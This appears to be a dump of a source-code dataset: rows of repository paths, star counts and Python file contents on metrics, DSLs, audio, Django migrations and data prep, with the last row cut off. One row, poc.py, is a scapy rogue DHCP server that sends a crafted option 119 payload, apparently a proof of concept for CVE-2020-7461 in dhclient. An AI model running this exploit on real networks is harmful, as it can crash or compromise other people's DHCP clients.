max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
Cylinder/input_files/pp.py
|
marchdf/turbulent-cylinder
| 0
|
12775551
|
<reponame>marchdf/turbulent-cylinder<filename>Cylinder/input_files/pp.py
# ========================================================================
#
# Imports
#
# ========================================================================
import argparse
import os
import numpy as np
import scipy.spatial.qhull as qhull
import pandas as pd
from mpi4py import MPI
import stk
# ========================================================================
#
# Functions
#
# ========================================================================
def p0_printer(par):
iproc = par.rank
def printer(*args, **kwargs):
if iproc == 0:
print(*args, **kwargs)
return printer
# ========================================================================
#
# Main
#
# ========================================================================
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description="A simple post-processing tool")
parser.add_argument(
"-m",
"--mfile",
help="Root name of files to postprocess",
required=True,
type=str,
)
parser.add_argument("--auto_decomp", help="Auto-decomposition", action="store_true")
parser.add_argument(
"--navg", help="Number of times to average", default=1, type=int
)
args = parser.parse_args()
fdir = os.path.dirname(args.mfile)
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
par = stk.Parallel.initialize()
printer = p0_printer(par)
mesh = stk.StkMesh(par)
printer("Reading meta data for mesh: ", args.mfile)
mesh.read_mesh_meta_data(args.mfile, auto_decomp=args.auto_decomp)
printer("Done reading meta data")
printer("Loading bulk data for mesh: ", args.mfile)
mesh.populate_bulk_data()
printer("Done reading bulk data")
num_time_steps = mesh.stkio.num_time_steps
max_time = mesh.stkio.max_time
tsteps = np.array(mesh.stkio.time_steps)
printer(f"""Num. time steps = {num_time_steps}\nMax. time step = {max_time}""")
# Figure out the times over which to average
tavg = tsteps[-args.navg :]
printer("Averaging the following steps:")
printer(tavg)
# Extract time and spanwise average tau_wall on cylinder
cyl_data = None
for tstep in tavg:
ftime, missing = mesh.stkio.read_defined_input_fields(tstep)
printer(f"Loading tau_wall fields for time: {ftime}")
coords = mesh.meta.coordinate_field
wall = mesh.meta.get_part("cylinder")
sel = wall & mesh.meta.locally_owned_part
tauw = mesh.meta.get_field("tau_wall")
pressure = mesh.meta.get_field("pressure")
names = ["x", "y", "z", "tauw", "pressure"]
nnodes = sum(bkt.size for bkt in mesh.iter_buckets(sel, stk.StkRank.NODE_RANK))
cnt = 0
data = np.zeros((nnodes, len(names)))
for bkt in mesh.iter_buckets(sel, stk.StkRank.NODE_RANK):
xyz = coords.bkt_view(bkt)
tw = tauw.bkt_view(bkt)
p = pressure.bkt_view(bkt)
data[cnt : cnt + bkt.size, :] = np.hstack(
(xyz, tw.reshape(-1, 1), p.reshape(-1, 1))
)
cnt += bkt.size
if cyl_data is None:
cyl_data = np.zeros(data.shape)
cyl_data += data / len(tavg)
lst = comm.gather(cyl_data, root=0)
comm.Barrier()
if rank == 0:
df = pd.DataFrame(np.vstack(lst), columns=names)
cyl = df.groupby("x", as_index=False).mean().sort_values(by=["x"])
cyl["r"] = np.sqrt(cyl.x ** 2 + cyl.y ** 2)
cyl["theta"] = (np.arctan2(cyl.x, cyl.y) + np.pi * 0.5) * 180 / np.pi
cylname = os.path.join(fdir, "cyl.dat")
cyl.to_csv(cylname, index=False)
| 2.21875
| 2
|
tests/r/test_engel.py
|
hajime9652/observations
| 199
|
12775552
|
<reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.engel import engel
def test_engel():
"""Test module engel.py by downloading
engel.csv and testing shape of
extracted data has 235 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = engel(test_path)
try:
assert x_train.shape == (235, 2)
except:
shutil.rmtree(test_path)
raise()
| 2.5
| 2
|
evaluation/metrics/metric_getters.py
|
adinawilliams/dynabench
| 15
|
12775553
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import yaml
from metrics.instance_property import instance_property
from metrics.metrics_dicts import (
delta_metrics_dict,
eval_metrics_dict,
job_metrics_dict,
metrics_meta_dict,
)
def get_eval_metrics(task, predictions: list, targets: list) -> tuple:
perf_metric_type = yaml.load(task.config_yaml, yaml.SafeLoader)["perf_metric"][
"type"
]
# NOTE:
# right now, the returned eval metric scores are just the perf metric, but we
# could add a feature that allows for the display of multiple eval metrics
metric_result = eval_metrics_dict[perf_metric_type](predictions, targets)
if isinstance(metric_result, dict):
score_dict = metric_result
else:
score_dict = {perf_metric_type: metric_result}
return score_dict[perf_metric_type], score_dict
def get_job_metrics(job, dataset, decen=False) -> dict:
if not job.aws_metrics:
return {}
instance_config = instance_property[dataset.task.instance_type]
job_metrics = instance_config["aws_metrics"]
return_dict = {}
for key in job_metrics:
if key == "examples_per_second":
return_dict[key] = job_metrics_dict[key](job, dataset, decen=decen)
else:
return_dict[key] = job_metrics_dict[key](job, dataset)
return return_dict
def get_delta_metrics(
task, predictions: list, targets: list, perturb_prefix: str
) -> dict:
"""
predictions: a list of list of predictions
targets: a list of labels
"""
perf_metric_type = yaml.load(task.config_yaml, yaml.SafeLoader)["perf_metric"][
"type"
]
perf_metric = eval_metrics_dict[perf_metric_type]
delta_metrics_scores = {
perturb_prefix: delta_metrics_dict[perturb_prefix](
predictions, targets, perf_metric
)
}
return delta_metrics_scores
def get_task_metrics_meta(task):
instance_config = instance_property[task.instance_type]
task_config = yaml.load(task.config_yaml, yaml.SafeLoader)
perf_metric_type = task_config["perf_metric"]["type"]
delta_metric_types = [obj["type"] for obj in task_config.get("delta_metrics", [])]
aws_metric_names = instance_config["aws_metrics"]
# TODO: make it possible to display some modes with aws metrics and some
# models without aws metrics on the same leaderboard?
if task.has_predictions_upload or "train_file_metric" in task_config:
aws_metric_names = []
ordered_metric_field_names = (
[perf_metric_type] + aws_metric_names + delta_metric_types
)
metrics_meta = {
metric: metrics_meta_dict.get(metric, metrics_meta_dict[perf_metric_type])(task)
for metric in ordered_metric_field_names
}
return metrics_meta, ordered_metric_field_names
| 2.234375
| 2
|
latent_programmer/tasks/robust_fill/dsl.py
|
shaun95/google-research
| 1
|
12775554
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines DSL for the RobustFill domain."""
import abc
import collections
import enum
import functools
import inspect
import re
import string
from typing import TypeVar, List, Dict, Tuple, Any, Optional
ProgramTask = collections.namedtuple('ProgramTask',
['program', 'inputs', 'outputs'])
# Describes range of possible indices for a character (for SubStr expression).
POSITION = [-100, 100]
# Describes range of possible indices for a regex.
INDEX = [-5, -4, -3, -2, -1, 1, 2, 3, 4, 5]
DELIMITER = '&,.?!@()[]%{}/:;$#"\' '
CHARACTER = string.ascii_letters + string.digits + DELIMITER
BOS = 'BOS'
EOS = 'EOS'
class Type(enum.Enum):
NUMBER = 1
WORD = 2
ALPHANUM = 3
ALL_CAPS = 4
PROP_CASE = 5
LOWER = 6
DIGIT = 7
CHAR = 8
class Case(enum.Enum):
PROPER = 1
ALL_CAPS = 2
LOWER = 3
class Boundary(enum.Enum):
START = 1
END = 2
Regex = TypeVar('Regex', Type, str)
def regex_for_type(t):
"""Map types to their regex string."""
if t == Type.NUMBER:
return '[0-9]+'
elif t == Type.WORD:
return '[A-Za-z]+'
elif t == Type.ALPHANUM:
return '[A-Za-z0-9]+'
elif t == Type.ALL_CAPS:
return '[A-Z]+'
elif t == Type.PROP_CASE:
return '[A-Z][a-z]+'
elif t == Type.LOWER:
return '[a-z]+'
elif t == Type.DIGIT:
return '[0-9]'
elif t == Type.CHAR:
return '[A-Za-z0-9' + ''.join([re.escape(x) for x in DELIMITER]) + ']'
else:
raise ValueError('Unsupported type: {}'.format(t))
def match_regex_substr(t, value):
regex = regex_for_type(t)
return re.findall(regex, value)
def match_regex_span(r, value):
if isinstance(r, Type):
regex = regex_for_type(r)
else:
assert (len(r) == 1) and (r in DELIMITER)
regex = '[' + re.escape(r) + ']'
return [match.span() for match in re.finditer(regex, value)]
class Base(abc.ABC):
"""Base class for DSL."""
@abc.abstractmethod
def __call__(self, value):
raise NotImplementedError
@abc.abstractmethod
def to_string(self):
raise NotImplementedError
def __repr__(self):
return self.to_string()
@abc.abstractmethod
def encode(self, token_id_table):
raise NotImplementedError
class Program(Base):
pass
class Concat(Program):
"""Concatenation of expressions."""
def __init__(self, *args):
self.expressions = args
def __call__(self, value):
return ''.join([e(value) for e in self.expressions])
def to_string(self):
return ' | '.join([e.to_string() for e in self.expressions])
def encode(self, token_id_table):
sub_token_ids = [e.encode(token_id_table) for e in self.expressions]
return (functools.reduce(lambda a, b: a + b, sub_token_ids)
+ [token_id_table[EOS]])
class Expression(Base):
pass
class Substring(Expression):
pass
class Modification(Expression):
pass
class Compose(Expression):
"""Composition of two modifications or modification and substring."""
def __init__(self, modification,
modification_or_substring):
self.modification = modification
self.modification_or_substring = modification_or_substring
def __call__(self, value):
return self.modification(self.modification_or_substring(value))
def to_string(self):
return (self.modification.to_string() + '('
+ self.modification_or_substring.to_string() + ')')
def encode(self, token_id_table):
return ([token_id_table[self.__class__]]
+ self.modification.encode(token_id_table)
+ self.modification_or_substring.encode(token_id_table))
class ConstStr(Expression):
"""Fixed character."""
def __init__(self, char):
self.char = char
def __call__(self, value):
return self.char
def to_string(self):
return 'Const(' + self.char + ')'
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.char]]
class SubStr(Substring):
"""Return substring given indices."""
def __init__(self, pos1, pos2):
self.pos1 = pos1
self.pos2 = pos2
def __call__(self, value):
# Positive indices start at 1.
p1 = self.pos1 - 1 if self.pos1 > 0 else len(value) + self.pos1
p2 = self.pos2 - 1 if self.pos2 > 0 else len(value) + self.pos2
if p1 >= p2: # Handle edge cases.
return ''
if p2 == len(value):
return value[p1:]
return value[p1:p2 + 1]
def to_string(self):
return 'SubStr(' + str(self.pos1) + ', ' + str(self.pos2) + ')'
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.pos1],
token_id_table[self.pos2],
]
class GetSpan(Substring):
"""Return substring given indices of regex matches."""
def __init__(self, regex1, index1, bound1,
regex2, index2, bound2):
self.regex1 = regex1
self.index1 = index1
self.bound1 = bound1
self.regex2 = regex2
self.index2 = index2
self.bound2 = bound2
@staticmethod
def _index(r, index, bound,
value):
"""Get index in string of regex match."""
matches = match_regex_span(r, value)
# Positive indices start at 1.
index = index - 1 if index > 0 else len(matches) + index
if not matches:
return -1
if index >= len(matches): # Handle edge cases.
return len(matches) - 1
if index < 0:
return 0
span = matches[index]
return span[0] if bound == Boundary.START else span[1]
def __call__(self, value):
p1 = GetSpan._index(self.regex1, self.index1, self.bound1, value)
p2 = GetSpan._index(self.regex2, self.index2, self.bound2, value)
if min(p1, p2) < 0: # pytype: disable=unsupported-operands
return ''
return value[p1:p2]
def to_string(self):
return ('GetSpan('
+ ', '.join(map(str, [self.regex1,
self.index1,
self.bound1,
self.regex2,
self.index2,
self.bound2]))
+ ')')
def encode(self, token_id_table):
return list(map(lambda x: token_id_table[x],
[self.__class__,
self.regex1,
self.index1,
self.bound1,
self.regex2,
self.index2,
self.bound2]))
class GetToken(Substring):
"""Get regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return ''
if index >= len(matches) or index < 0: # Handle edge cases.
return ''
return matches[index]
def to_string(self):
return 'GetToken_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class ToCase(Modification):
"""Convert to case."""
def __init__(self, case):
self.case = case
def __call__(self, value):
if self.case == Case.PROPER:
return value.capitalize()
elif self.case == Case.ALL_CAPS:
return value.upper()
elif self.case == Case.LOWER:
return value.lower()
else:
raise ValueError('Invalid case: {}'.format(self.case))
def to_string(self):
return 'ToCase_' + str(self.case)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.case]]
class Replace(Modification):
"""Replace delimitors."""
def __init__(self, delim1, delim2):
self.delim1 = delim1
self.delim2 = delim2
def __call__(self, value):
return value.replace(self.delim1, self.delim2)
def to_string(self):
return 'Replace_' + str(self.delim1) + '_' + str(self.delim2)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.delim1],
token_id_table[self.delim2],
]
class Trim(Modification):
"""Trim whitspace."""
def __init__(self):
pass
def __call__(self, value):
return value.strip()
def to_string(self):
return 'Trim'
def encode(self, token_id_table):
return [token_id_table[self.__class__]]
class GetUpto(Substring):
"""Get substring up to regex match."""
def __init__(self, regex):
self.regex = regex
def __call__(self, value):
matches = match_regex_span(self.regex, value)
if not matches:
return ''
first = matches[0]
return value[:first[1]]
def to_string(self):
return 'GetUpto_' + str(self.regex)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex]]
class GetFrom(Substring):
"""Get substring from regex match."""
def __init__(self, regex):
self.regex = regex
def __call__(self, value):
matches = match_regex_span(self.regex, value)
if not matches:
return ''
first = matches[0]
return value[first[1]:]
def to_string(self):
return 'GetFrom_' + str(self.regex)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex]]
class GetFirst(Modification):
"""Get first occurrences of regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
if not matches:
return ''
if self.index >= len(matches):
return ''.join(matches)
return ''.join(matches[:self.index])
def to_string(self):
return 'GetFirst_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class GetAll(Modification):
"""Get all occurrences of regex match."""
def __init__(self, regex_type):
self.regex_type = regex_type
def __call__(self, value):
return ''.join(match_regex_substr(self.regex_type, value))
def to_string(self):
return 'GetAll_' + str(self.regex_type)
def encode(self, token_id_table):
return [token_id_table[self.__class__], token_id_table[self.regex_type]]
# New Functions
# ---------------------------------------------------------------------------
class Substitute(Modification):
"""Replace i-th occurence of regex match with constant."""
def __init__(self, regex_type, index, char):
self.regex_type = regex_type
self.index = index
self.char = char
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return value
if index >= len(matches) or index < 0: # Handle edge cases.
return value
return value.replace(matches[index], self.char, 1)
def to_string(self):
return ('Substitute_' + str(self.regex_type) + '_' + str(self.index) + '_'
+ self.char)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
token_id_table[self.char],
]
class SubstituteAll(Modification):
"""Replace all occurences of regex match with constant."""
def __init__(self, regex_type, char):
self.regex_type = regex_type
self.char = char
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
for match in matches:
value = value.replace(match, self.char, 1)
return value
def to_string(self):
return 'SubstituteAll_' + str(self.regex_type) + '_' + self.char
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.char],
]
class Remove(Modification):
"""Remove i-th occurence of regex match."""
def __init__(self, regex_type, index):
self.regex_type = regex_type
self.index = index
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
# Positive indices start at 1.
index = self.index - 1 if self.index > 0 else len(matches) + self.index
if not matches:
return value
if index >= len(matches) or index < 0: # Handle edge cases.
return value
return value.replace(matches[index], '', 1)
def to_string(self):
return 'Remove_' + str(self.regex_type) + '_' + str(self.index)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
token_id_table[self.index],
]
class RemoveAll(Modification):
"""Remove all occurences of regex match."""
def __init__(self, regex_type):
self.regex_type = regex_type
def __call__(self, value):
matches = match_regex_substr(self.regex_type, value)
for match in matches:
value = value.replace(match, '', 1)
return value
def to_string(self):
return 'RemoveAll_' + str(self.regex_type)
def encode(self, token_id_table):
return [
token_id_table[self.__class__],
token_id_table[self.regex_type],
]
def decode_expression(encoding,
id_token_table):
"""Decode sequence of token ids to expression (excluding Compose)."""
cls = id_token_table[encoding[0]]
return cls(*list(map(lambda x: id_token_table[x], encoding[1:])))
def decode_program(encoding,
id_token_table):
"""Decode sequence of token ids into a Concat program."""
expressions = []
idx = 0
while idx < len(encoding) - 1:
elem = id_token_table[encoding[idx]]
if elem == Compose: # Handle Compose separately.
idx += 1
modification_elem = id_token_table[encoding[idx]]
n_args = len(inspect.signature(modification_elem.__init__).parameters)
modification = decode_expression(encoding[idx:idx+n_args], id_token_table)
idx += n_args
modification_or_substring_elem = id_token_table[encoding[idx]]
n_args = len(
inspect.signature(modification_or_substring_elem.__init__).parameters)
modification_or_substring = decode_expression(encoding[idx:idx+n_args],
id_token_table)
idx += n_args
next_e = Compose(modification, modification_or_substring)
else:
n_args = len(inspect.signature(elem.__init__).parameters)
next_e = decode_expression(encoding[idx:idx+n_args], id_token_table)
idx += n_args
expressions.append(next_e)
assert id_token_table[encoding[idx]] == EOS
return Concat(*expressions)
| 2.90625
| 3
|
flystim/flystim/audio.py
|
ClandininLab/multistim
| 0
|
12775555
|
<reponame>ClandininLab/multistim
import sys
import pyaudio
from time import sleep, time
import numpy as np
from flyrpc.transceiver import MySocketServer
from flyrpc.util import get_kwargs
def sine_song(sr, volume=1.0, duration=1.0, freq=225.0):
t = np.linspace(0, duration, round(duration * sr))
samples = volume * np.sin(2 * np.pi * freq * t)
return np.floor(samples*2**15).astype(np.int16)
def pulse_song(sr, volume=1.0, duration=1.0, freq=125.0, pcycle=0.016, ncycle=0.020):
cycles = round(duration/(pcycle + ncycle))
sigm = pcycle / 4
K = 0.5 * sigm ** 2
seg = (pcycle + ncycle) * sr
seg = int(seg)
t = np.linspace(0, (seg - 1) / sr, seg)
t = t - np.mean(t)
y = np.exp(-t ** 2 / K) * np.cos(2 * np.pi * freq * t)
samples = np.zeros(seg * cycles)
for i in range(cycles):
samples[seg * i:seg * (i + 1)] = y
samples = np.delete(samples, slice(0, int(seg / 4)))
samples = volume * samples
return np.floor(samples * 2 ** 15).astype(np.int16)
class AudioPlay:
def __init__(self, sample_rate=44100):
self.sr = sample_rate
self.speaker = pyaudio.PyAudio()
self.soundTrack = None
self.stream = None
def __del__(self):
self.speaker.terminate()
def load_stim(self, name, **kwargs):
stim = getattr(sys.modules[__name__], name)
kwargs['sr'] = self.sr
self.soundTrack = stim(**kwargs)
self.stream = self.speaker.open(format=pyaudio.paInt16,
channels=1,
rate=self.sr,
output=True)
def start_stim(self):
print('command executed to speaker at %s' % time())
if (self.soundTrack is not None) and (len(self.soundTrack) > 0):
self.stream.write(self.soundTrack, num_frames=len(self.soundTrack))
def stop_stim(self):
self.soundTrack = None
self.stream.stop_stream()
self.stream.close()
def main():
# get the configuration parameters
kwargs = get_kwargs()
# launch the server
server = MySocketServer(host=kwargs['host'], port=kwargs['port'], threaded=True, auto_stop=True, name='speaker')
# launch application
audio = AudioPlay(sample_rate=44100)
# register functions
server.register_function(audio.load_stim)
server.register_function(audio.start_stim)
server.register_function(audio.stop_stim)
while True:
server.process_queue()
if __name__ == '__main__':
main()
| 2.40625
| 2
|
schedule/migrations/0003_auto_20160715_0028.py
|
PicaMirum/django-scheduler
| 4
|
12775556
|
<filename>schedule/migrations/0003_auto_20160715_0028.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schedule', '0002_event_color_event'),
]
operations = [
migrations.AlterField(
model_name='event',
name='end',
field=models.DateTimeField(help_text='The end time must be later than the start time.', verbose_name='end', db_index=True),
),
migrations.AlterField(
model_name='event',
name='end_recurring_period',
field=models.DateTimeField(help_text='This date is ignored for one time only events.', null=True, verbose_name='end recurring period', db_index=True, blank=True),
),
migrations.AlterField(
model_name='event',
name='start',
field=models.DateTimeField(verbose_name='start', db_index=True),
),
migrations.AlterField(
model_name='occurrence',
name='end',
field=models.DateTimeField(verbose_name='end', db_index=True),
),
migrations.AlterField(
model_name='occurrence',
name='start',
field=models.DateTimeField(verbose_name='start', db_index=True),
),
migrations.AlterIndexTogether(
name='event',
index_together=set([('start', 'end')]),
),
migrations.AlterIndexTogether(
name='occurrence',
index_together=set([('start', 'end')]),
),
]
| 1.765625
| 2
|
poc.py
|
knqyf263/CVE-2020-7461
| 12
|
12775557
|
#!/usr/bin/python
from scapy.all import *
import binascii
src_mac = "[YOUR_MAC_ADDR]"
dst_addr = "192.168.33.123"
src_addr = "192.168.33.11"
gateway = "192.168.33.1"
subnet_mask = "255.255.255.0"
iface = "[YOUR_INTERFACE]"
filter = "udp port 67"
def handle_packet(packet):
eth = packet.getlayer(Ether)
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
bootp = packet.getlayer(BOOTP)
dhcp = packet.getlayer(DHCP)
dhcp_message_type = None
if not dhcp:
return False
for opt in dhcp.options:
if opt[0] == "message-type":
dhcp_message_type = opt[1]
# DHCP Offer
if dhcp_message_type == 1:
chaddr = binascii.unhexlify(eth.src.replace(":", ""))
ethernet = Ether(dst=eth.src, src=src_mac)
ip = IP(dst=dst_addr, src=src_addr)
udp = UDP(sport=udp.dport, dport=udp.sport)
bootp = BOOTP(
op="BOOTREPLY",
yiaddr=dst_addr,
siaddr=gateway,
chaddr=chaddr,
xid=bootp.xid,
)
dhcp = DHCP(
options=[
("message-type", "offer"),
("server_id", src_addr),
("subnet_mask", subnet_mask),
("end"),
]
)
ack = ethernet / ip / udp / bootp / dhcp
sendp(ack, iface=iface)
# DHCP ACK
elif dhcp_message_type == 3:
chaddr = binascii.unhexlify(eth.src.replace(":", ""))
ethernet = Ether(dst=eth.src, src=src_mac)
ip = IP(dst=dst_addr, src=src_addr)
udp = UDP(sport=udp.dport, dport=udp.sport)
bootp = BOOTP(
op="BOOTREPLY",
yiaddr=dst_addr,
siaddr=gateway,
chaddr=chaddr,
xid=bootp.xid,
)
dhcp = DHCP(
options=[
("message-type", "ack"),
("server_id", src_addr),
("lease_time", 43200),
("subnet_mask", subnet_mask),
(
119,
b"\x02\xc0\x01\x00\x01\x41\xc0\x01",
),
("end"),
]
)
ack = ethernet / ip / udp / bootp / dhcp
sendp(ack, iface=iface)
print("Sniffing...")
sniff(iface=iface, filter=filter, prn=handle_packet)
| 2.5625
| 3
|
Session 05 - Functions/importexample.py
|
boragungoren-portakalteknoloji/METU-BA4318-Fall2018
| 0
|
12775558
|
import mysamplefunctions
variable = -5
print("variable is:", variable)
abs = mysamplefunctions.absolute(variable)
print ("absolute value is:", abs)
from mysamplefunctions import areatriangle
w = 5
h = 10
print("area is:", areatriangle(width=w, height=h) )
from mysamplefunctions import areacircle, summation
radius = 10
area1 = areacircle(radius)
area2 = areacircle(radius, 3)
area3 = areacircle(radius, pi = 3.14)
print("area1: ", area1, "area2: ", area2, "area3: ", area3)
total1 = summation (1,2,3,4,5)
print("total1:", total1)
from mysamplefunctions import *
mynumbers = [1,2,3,4,5]
total3 = sumbylist (mynumbers)
print("total3:", total3)
total4 = summation (1,2,3,4,5)
print("total4:", total4)
| 3.65625
| 4
|
tdrn2cartucho.py
|
KenYu910645/mAP
| 0
|
12775559
|
<reponame>KenYu910645/mAP<filename>tdrn2cartucho.py<gh_stars>0
# This code convert result.txt to input/detection-results/
# result.txt is yolov4 model detection output file
input_result_path = "/Users/lucky/Desktop/VOC07/-1_VOC0712_test/results/"
input_annoated_path = "/Users/lucky/Desktop/VOCdevkit/VOC2007/Annotations/"
image_path = "/Users/lucky/Desktop/VOCdevkit/VOC2007/JPEGImages/"
output_dir_path = "/Users/lucky/Desktop/mAP/tdrn_result_image/"
import pprint
import os
from collections import defaultdict
THRES = 0.5
# Get result_dic from detection results
file_list = os.listdir(input_result_path)
result_dic = defaultdict(list)
for file_name in file_list:
class_name = file_name.split('_')[-1].split('.')[0]
# print(class_name)
with open(input_result_path + file_name) as f:
for line in f: # 000067 0.999 45.2 73.2 448.5 212.3
image_num, conf, x1, y1, x2, y2 = line.split()# [000067, 0.999, 45.2, 73.2, 448.5, 212.3]
result_dic[image_num].append((class_name, float(conf), float(x1), float(y1), float(x2), float(y2)))
# print(result_dic)
print("Done reading detection results ")
import xml.etree.ElementTree as ET
for img_num in result_dic:
tree = ET.parse(input_annoated_path + img_num + ".xml")
root = tree.getroot()
for obj in root.findall('object'):
class_name = obj.find('name').text
bb = obj.find('bndbox')
result_dic[img_num].append((class_name, "annotate", bb[0].text, bb[1].text, bb[2].text, bb[3].text))
print("Done reading annatation data")
import cv2
# draw image
for i, img_num in enumerate(result_dic):
img = cv2.imread(image_path + img_num + ".jpg")
for det in result_dic[img_num]:
class_name = det[0]
conf = det[1]
if conf == "annotate":
cv2.rectangle(img,
(int(det[2]), int(det[3])),
(int(det[4]), int(det[5])),
(0, 255, 0),
2)
else:
if conf > THRES:
cv2.rectangle(img,
(int(det[2]), int(det[3])),
(int(det[4]), int(det[5])),
(0, 0, 255),
2)
cv2.putText(img,
class_name + " " + str(round(conf, 2)),
(int(det[2]), int(det[3])),
cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 2, cv2.LINE_AA)
cv2.imwrite(output_dir_path + img_num + ".jpg", img)
print(str(i) + " / " + str(len(result_dic)))
| 2.484375
| 2
|
mml/data/adult/adult.py
|
feedbackward/mml
| 0
|
12775560
|
'''H5 data prep'''
## External modules.
import csv
import numpy as np
import os
import tables
## Internal modules.
from mml.config import dir_data_toread
from mml.config import dir_data_towrite
from mml.utils import makedir_safe
###############################################################################
## Clerical setup.
data_name = "adult"
toread_tr = os.path.join(dir_data_toread, data_name, "adult.data")
toread_te = os.path.join(dir_data_toread, data_name, "adult.test")
newdir = os.path.join(dir_data_towrite, data_name)
towrite = os.path.join(newdir, "adult.h5")
attribute_names = [
"age", "workclass", "fnlwgt", "education", "education-num",
"marital-status", "occupation", "relationship", "race", "sex",
"capital-gain", "capital-loss", "hours-per-week", "native-country"
] # order is important.
attribute_dict = {
"age": ["continuous"],
"workclass": ["Private", "Self-emp-not-inc", "Self-emp-inc",
"Federal-gov", "Local-gov", "State-gov",
"Without-pay", "Never-worked"],
"fnlwgt": ["continuous"],
"education": ["Bachelors", "Some-college", "11th", "HS-grad",
"Prof-school", "Assoc-acdm", "Assoc-voc", "9th",
"7th-8th", "12th", "Masters", "1st-4th", "10th",
"Doctorate", "5th-6th", "Preschool"],
"education-num": ["continuous"],
"marital-status": ["Married-civ-spouse", "Divorced",
"Never-married", "Separated", "Widowed",
"Married-spouse-absent", "Married-AF-spouse"],
"occupation": ["Tech-support", "Craft-repair", "Other-service",
"Sales", "Exec-managerial", "Prof-specialty",
"Handlers-cleaners", "Machine-op-inspct",
"Adm-clerical", "Farming-fishing",
"Transport-moving", "Priv-house-serv",
"Protective-serv", "Armed-Forces"],
"relationship": ["Wife", "Own-child", "Husband", "Not-in-family",
"Other-relative", "Unmarried"],
"race": ["White", "Asian-Pac-Islander", "Amer-Indian-Eskimo",
"Other", "Black"],
"sex": ["Female", "Male"],
"capital-gain": ["continuous"],
"capital-loss": ["continuous"],
"hours-per-week": ["continuous"],
"native-country": ["United-States", "Cambodia", "England",
"Puerto-Rico", "Canada", "Germany",
"Outlying-US(Guam-USVI-etc)", "India",
"Japan", "Greece", "South", "China", "Cuba",
"Iran", "Honduras", "Philippines", "Italy",
"Poland", "Jamaica", "Vietnam", "Mexico",
"Portugal", "Ireland", "France",
"Dominican-Republic", "Laos", "Ecuador",
"Taiwan", "Haiti", "Columbia", "Hungary",
"Guatemala", "Nicaragua", "Scotland",
"Thailand", "Yugoslavia", "El-Salvador",
"Trinadad&Tobago", "Peru", "Hong",
"Holand-Netherlands"]
}
label_dict = {"<=50K": 0,
">50K": 1}
n_tr = 30162 # number of clean instances.
n_te = 15060 # number of clean instances.
n_all = n_tr+n_te
num_features = np.array(
[ len(attribute_dict[key]) for key in attribute_dict.keys() ]
).sum() # number of features after a one-hot encoding.
num_classes = 2
num_labels = 1
title = data_name+": Full dataset"
title_X = data_name+": Features"
title_y = data_name+": Labels"
dtype_X = np.float32
atom_X = tables.Float32Atom()
dtype_y = np.uint8
atom_y = tables.UInt8Atom()
def parse_line(x, y):
## Inputs are a bit complicated.
x_out_list = []
for j in range(len(x)):
value = x[j]
attribute = attribute_names[j]
num_distinct = len(attribute_dict[attribute])
## Ignore all points with missing entries.
if value == "?":
return (None, None)
else:
if num_distinct > 1:
idx_hot = attribute_dict[attribute].index(value)
onehot = np.zeros(num_distinct, dtype=dtype_X)
onehot[idx_hot] = 1.0
x_out_list.append(onehot)
else:
x_out_list.append(np.array([value], dtype=dtype_X))
x_out = np.concatenate(x_out_list)
if len(x_out) != num_features:
raise ValueError("Something is wrong with the feature vec parser.")
## Labels are easy.
y_out = np.array([label_dict[y]], dtype=dtype_y)
return x_out, y_out
def raw_to_h5():
'''
Transform the raw dataset into one of HDF5 type.
'''
X_raw_tr = np.zeros((n_tr,num_features), dtype=dtype_X)
y_raw_tr = np.zeros((n_tr,num_labels), dtype=dtype_y)
X_raw_te = np.zeros((n_te,num_features), dtype=dtype_X)
y_raw_te = np.zeros((n_te,num_labels), dtype=dtype_y)
print("Preparation: {}".format(data_name))
